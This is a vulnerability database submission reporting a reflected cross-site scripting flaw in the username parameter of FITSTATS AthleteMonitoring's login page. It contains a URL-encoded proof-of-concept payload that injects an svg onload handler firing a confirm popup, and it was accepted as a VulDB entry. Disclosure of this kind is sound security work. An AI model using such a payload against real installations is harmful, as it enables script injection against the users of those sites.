| Title | FITSTATS Technologies AthleteMonitoring N/A Cross Site Scripting |
|---|---|
| Description | Hello, I found an XSS vulnerability in the username parameter of the application. Note that it is a service sold to several organizations and governments.<br>Vendor URL: https://www.athletemonitoring.com/<br>On the home page and the following URL you have all the clients: https://www.athletemonitoring.com/clients/<br>PoC:<br>`https://example.com/login.php?username=%22%3E%3Csvg%2Fonload=confirm%28%27xss-c4ng4c31r0%27%29%3E` |
| User | c4ng4c3ir0 (UID 38456) |
| Submission | 20.02.2025 18:59 (1 year ago) |
| Moderation | 02.03.2025 16:32 (10 days later) |
| Status | Accepted |
| VulDB Entry | 298108 [FITSTATS Technologies AthleteMonitoring up to 20250302 /login.php username Cross Site Scripting] |
| Points | 16 |